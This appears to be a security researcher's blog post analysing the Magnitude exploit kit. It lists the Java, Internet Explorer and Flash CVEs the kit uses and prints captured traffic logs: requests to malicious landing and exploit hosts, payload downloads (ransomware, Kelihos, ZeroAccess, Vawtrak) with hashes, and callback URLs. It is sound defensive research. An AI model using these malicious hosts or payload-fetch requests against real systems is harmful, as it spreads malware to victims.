Magnitude |
Magnitude is a community name choosen for an Exploit Kit previously referred to as "Popads".
Why Popads ?
Many days after it was first spotted, the driveby was being done using Malvert pushed via PopAds
And all landing were ending with popads.com
Magnitude 2013-03-22 Here referer : sweerl.biz |
PopAds being a legit company fighting against malverts, we had to choose a proper name.
As we don't know its real name (if one), a video proposed by Will Metcalf from Emerging Threats made a consensus
Community - Magnitude (Pop pop!)
Since Paunch's Arrest we are seing more and more Magnitude.
User on an Underground Forum seeking for Magnitude (^^) to grow his botnet The world upside down. |
Now let's see how it's "weaponized".
Disclaimer : as usual I may hide information on stuff that seems broken.
CVE-2013-2463 with click2play bypass :
Spotted inside 2013-10-19 but was maybe there since 1 or 2 weeks.CVE-2013-2463 + c2p bypass in Magnitude 2013-10-25 After that the computer is...slightly infected. |
200 OK (text/html)
Magnitude Landing - Highlighted : the piece of code that won't be 404 rejected (UA based) with the configuration presented to the EK |
GET http://khncudlm.7rahdeqi.info/80560ef3eddd08c9d455d41af5ea8592/cc84e758a3b4611de79628ee89895e13.swf
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/131548a8413b7f63f89dff19f8563a5e
200 OK (text/html) (this is for CVE-2013-2551 see later)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/28322e8e52bc381204f0b1e65c40e174
200 OK (text/html)
jnlp for Click2Play Bypass on jre17u21 |
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive) 1c3d690421a56c5c67e211d747df9b72
Piece of CVE-2013-2463 in Magnitude Jar |
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0f924936b800ba82b17b2085bfd53753.jar
200 OK (application/x-java-archive)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/48f8d65ddc1187cb0a36b0c7e0c95b9f
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/0
200 OK (text/html) Payload 1 c2a974e04298b557f976818200c879ab Stitur Ransomware
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/u.class
404 Not Found (text/html)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/1
200 OK (text/html) Payload 2 ba923eb3b0968a58a090db1e3079080d <- Redyms. Thx Kimberly (Stopmalvertising).
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/2
200 OK (text/html) Payload 3 f577eef07ef8331311f93fe1918c6cc6 Kelihos Spambot/loader
(Out of scope -- do :
85.255.57.253
GET /cuper02.exe HTTP/1.0 --> 004874bb466e6b8eb3dd7b09f7e3855d )
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/3
200 OK (text/html) Payload 4 (empty)
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/4
200 OK (text/html) Payload 5 4903405b85b5584fa93a1e4591b80f64 Zaccess
GET http://khncudlm.7rahdeqi .info/80560ef3eddd08c9d455d41af5ea8592/5
200 OK (text/html) Payload 6 818f9ea202ce30645d2fb547ff1829f8 Vawtrak (Thx @virtualalloc for the information)
Note : 5 payloads...among which a Ransomware...not sure beneficiary(ies) of the other payloads would appreciate as after Ransomware computer goes for cleaning. Explanation ? I would say the owner of this Magnitude thread is selling loads for same traffic to different customers/affiliates.
CVE-2011-3402 :
The CVE is inside (see below) but couldn't get it to fire as it's overlaping with CVE-2013-2551.Have some idea to trigger it. Will maybe update later.
CVE-2012-0507 :
I made the pass on the "ru8080" thread. (Ex : /news/ BH EK )
CVE-2012-0507 Pass in Magnitude |
GET http://ilkbxnmtce.1deepinsget .info/?e15023ac04e9f62ad61f23a2439a9b1e=29
200 OK (text/html)
Magnitude Landing - 2013-10-25 Highlighted the code that won't UA 404. (3 jar call (?)<embed> - Firefox - <object> IE <applet> has been deprecated ) |
GET http://ilkbxnmtce.1deepinsget .info/ff498283b05fd88b573e0cce15b22de5.eot
200 OK (application/vnd.ms-fontobject) CVE-2011-3402 <--
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/09c164f4b0f930b8c10c476ec5dbfbec.swf
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget.info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/8cc36c1a70beae826a15bb7df6ab5b1d
200 OK (text/html) CVE-2013-2551 (see later)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive) b075fbbe5e96e73a9a597062d6c01444
Piece of CVE-2012-0507 in Magnitude Jar |
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/594ce31549c12857a01c64d38c91007c
200 OK (application/x-java-archive)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/0
200 OK (text/html) Payload 1 148ae098e23c4844ce25990643cc4150 Stitur
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/a9c055da58058587affc7224687f99db
404 Not Found (text/html)
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/1
200 OK (text/html) Payload2 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/2
200 OK (text/html) Payload3 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/3
200 OK (text/html) Payload4 empty
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/4
200 OK (text/html) Payload 5 07b8dafe506e56a40527b96722bf5c70
GET http://ilkbxnmtce.1deepinsget .info/2b4e0fe1a57bc7b2fef7ec00b7dc35dc/5
200 OK (text/html) Payload 6 empty
CVE-2013-2551 :
Inside since 2013-10-06
First time i saw it, once decoded, it was copy paste of the code from HiMan EK (the kaf() function in HiMan got my attention for some reasons).
First time i saw it, once decoded, it was copy paste of the code from HiMan EK (the kaf() function in HiMan got my attention for some reasons).
Magnitude EK (formerly popads) has integrated CVE-2013-2551 yesterday. ( HiMan EK copy paste again :S ) pic.twitter.com/s0NslEokhf
— kafeine (@kafeine) October 7, 2013
I won't spend much time on that one.
GET http://tpwqihdqrb.2deepinsget .info/?103cacc2431cf5b7bec74b56d3a60444=n11&2550a61eab180c8cfd230ffc41bf33ee=google.com&26f72647ceaa00ff4e35ed5ee16cf9fa=[redacted].com
200 OK (text/html)
Magnitude Landing 2013-10-25 Highlighted the code that will fire in this pass |
GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/13cd72e17e6b22c976eeba91c2ab577a.swf
404 Not Found (text/html)
GET http://tpwqihdqrb.2deepinsget .info/8eab366e152f633afc4eede350c2f657/6f1ed403773ad2b9dd44dc0fbcefadef
200 OK (text/html)
GET http://5.79.85 .237/?eade56046ab80efc3a5dd1dd83f78258
200 OK (text/html) Payload 1 : df1ada88e40a58da18dc4b408600e0a5 Winwebsec
(OT: do : 219.235.1.127GET /api/dom/no_respond/?ts=8aad4fca6d94d7b467bbaed2d1747d2e5a1cb210&token=sysdocx1&group=asp&nid=264D4000&lid=0058&ver=0058&affid=76900&dx=0 HTTP/1.1 <-- FakeAV : Winwebsec )
GET http://5.79.85 .237/?4c9a37a894f9cee76c89df68f4c18615
200 OK (text/html) Payload 2 : 4b9c8466cae1da89923ac89eca79db2a (Kelihos Spambot)
GET http://5.79.85 .237/?8dc8e224de9248e8e1cb72ceac8a5599
200 OK (text/html) Payload 3 : 2188d6a0d622d23a9c9bb7208a9f388c (Kelihos Spambot ..again (?!?) )
GET http://5.79.85 .237/?28847bf8f7c082fcd967ac01dbaec03e
200 OK (text/html) Payload 4 (empty)
GET http://5.79.85 .237/?cf20e7e042371ed8b65339bbd931e8b3
200 OK (text/html) Payload 5 : 0ac65603f3519ac09187b35df203905f Zaccess
GET http://5.79.85 .237/?ac339e60d0e6eeb0e5a1caa4d11c2fe5
200 OK (text/html) Payload 6 (empty)
(In some configuration you can get the Java call...but most of the time you'll have an IE crash before)
CVE-2013-0634 (?) :
If so inside since at least 2013-03-22CVE-2013-0634 (?) CVE Path |
GET http://vedktnyo.3deepinsget
.info/?c372e0cf1d9e9ec9b56349796a1ceb22=34
200 OK (text/html)
GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/100b9090c5f6d6577b33fb8ece0c4d45.swf
200 OK (application/x-shockwave-flash) 3f4261ccc6edb559e623906472d5cd2f So CVE-2013-0634 (?)...Can't figure this out for sure. Help would be greatly appreciated :)
Sample and Associated Fiddler (Owncloud)
GET http://vedktnyo.3deepinsget .info/12db6830c13debce138ba17130b7115a/882173c54e09bf0968cbda6b32c1d145
200 OK (text/html) CVE-2013-2551 (see before)
GET http://gabetiznol .info/calculator.exe
200 OK (text/html) aeaf204a9e5e6dd55d2a85ae1b7a0dd1
------
Off Topic Payload :
74.86.20.50 http://twinkcam .net/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
36351 | 74.86.0.0/16 | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.
216.17.105.36 http://cinnamyn .com/images/s.php?id=92.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
30266 | 216.17.104.0/21 | A1COLO-COM | US | A1COLO.COM | A1COLO.COM
74.86.20.50 http://saggerboy .com/twg/b.php?id=92.1
User-Agent: Mozilla
Want to know more? S!ri's posts about it
--------
<edit1 2013-11-07>
After around 8 hours of maintenance where thread link were replying with a "stoptraff" Magnitude is back with small changes.
Magnitude Landing change on 2013-11-07 |
Exploitation Graph :
Magnitude Exploitation Graph 2013-10-26 |
To simplify : No plugin-detect. Your browser is being told to gather all the bullets...those that does not fit (User-Agent server side check) are then refused to him.
Thanks : Chris Wakelin and Will Metcalf
Thanks : Chris Wakelin and Will Metcalf